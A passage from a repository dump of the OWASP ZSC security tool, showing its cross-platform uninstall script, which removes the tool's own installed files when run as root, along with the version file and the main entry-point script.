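https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import os
import shutil
import stat
import sys
from core import start
from core import color
#start.logo()


def _retry_writable(func, target, exc_info):
    """rmtree error hook: on Windows clear the read-only bit and retry once."""
    if os.name != 'nt':
        raise exc_info[1]
    os.chmod(target, stat.S_IWRITE)
    func(target)


def _remove_path(path):
    """Delete *path* (file, symlink or directory tree) without a shell.

    A missing path counts as success.  A symlink is unlinked, never
    followed.  Returns False, after printing the error, when deletion fails.
    """
    try:
        if os.path.isdir(path) and not os.path.islink(path):
            shutil.rmtree(path, onerror=_retry_writable)
        elif os.path.lexists(path):
            try:
                os.remove(path)
            except OSError:
                if os.name != 'nt':
                    raise
                # Read-only file on Windows: clear the bit and retry.
                os.chmod(path, stat.S_IWRITE)
                os.remove(path)
    except OSError as err:
        print(color.color('red') + 'Could not remove %s: %s' % (path, err) +
              color.color('white'))
        return False
    return True


def _uninstall(paths):
    """Remove every path in *paths*; report success only if all were removed."""
    print(color.color('green') + 'Removing Files' + color.color('white'))
    outcomes = [_remove_path(path) for path in paths]
    if all(outcomes):
        print(color.color('green') + 'Files Removed!' + color.color('white'))


def _require_root():
    """Exit unless the effective uid is 0."""
    # Compare by value; `is not 0` tests object identity, not equality.
    if os.geteuid() != 0:
        sys.exit(color.color('red') + 'Sorry, you most run this file as root.'
                 + color.color('reset'))


if 'linux' in sys.platform:
    _require_root()
    os.system('clear')
    _uninstall(['/usr/share/owasp_zsc', '/usr/bin/zsc'])
elif 'darwin' in sys.platform:
    _require_root()
    os.system('clear')
    _uninstall(['/usr/local/share/owasp_zsc', '/usr/local/bin/zsc'])
elif 'win32' in sys.platform or 'win64' in sys.platform:
    #import ctypes
    #if ctypes.windll.shell32.IsUserAnAdmin() != 1:
    #    sys.exit(color.color('red')+'Sorry, you most run this file as admin.'+color.color('reset'))
    installing_path = str(sys.prefix) + str('\\Scripts\\zsc')
    # The path used to be pasted unquoted into `rmdir ... /s /q`; a prefix
    # containing a space would have made rmdir act on the wrong directories.
    # File APIs take the path as one argument and need no shell.
    _uninstall([installing_path,
                os.path.join(os.path.dirname(installing_path), 'zsc.bat')])
else:
    sys.exit(
        color.color('red') +
        'OWASP ZSC currently supports uninstall on windows/linux/osx only, for other platforms please remove source files.'
        + color.color('reset'))
start.sig()
--------------------------------------------------------------------------------
/version:
--------------------------------------------------------------------------------
1.1.0
--------------------------------------------------------------------------------
/zsc.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
'''
OWASP ZSC
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
https://github.com/zscproject/OWASP-ZSC
http://api.z3r0d4y.com/
https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
'''
import sys
import os
from core.compatible import *
from core.start import logo
from core.controller import _interface


def main():
    ''' Main function: print the logo, then start the interface. '''
    logo()  #zsc logo
    _interface()


if __name__ == "__main__":
    # check() is not defined in this file; presumably it comes from the star
    # import of core.compatible.
    check()  #check os and python version if compatible
    main()  #execute main function
--------------------------------------------------------------------------------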